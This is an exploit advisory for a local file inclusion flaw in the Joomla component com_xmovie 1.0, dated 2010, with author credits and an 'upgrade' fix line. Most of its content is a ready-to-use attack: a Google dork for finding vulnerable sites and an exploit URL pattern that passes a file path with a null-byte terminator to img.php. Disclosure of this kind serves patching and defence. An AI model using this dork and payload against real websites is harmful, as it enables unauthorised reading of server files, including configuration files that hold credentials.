The Joomla XMovie component version 1.0 suffers from a local file inclusion vulnerability.
0471850bbabc016a1405f8aa7f428dfd0194d0d5ab1b97cbf317b2d7e16bf36f
# Exploit Title: Joomla Component com_xmovie 1.0 Local File Inclusion Vulnerability
# Author: KelvinX (kelvinxgr@gmail.com)
# Websites: http://xgroup.vn, http://kelvinx.net, http://facebook.com/kelvinxgr
# Date: December, 24-2010
# Location: HCM City, Vietnam
------------------------
# Application: com_xmovie
# Version: 1.0
# Vendor: http://extensions.joomla.org/extensions/multimedia/multimedia-players/video-players-a-gallery/15297
# Google Dorks: inurl:com_xmovie
------------------------
Exploit: http://www.site.com/components/com_xmovie/helpers/img.php?file=[LFI]%00
------------------------
# Solution: Upgrade to the most recent version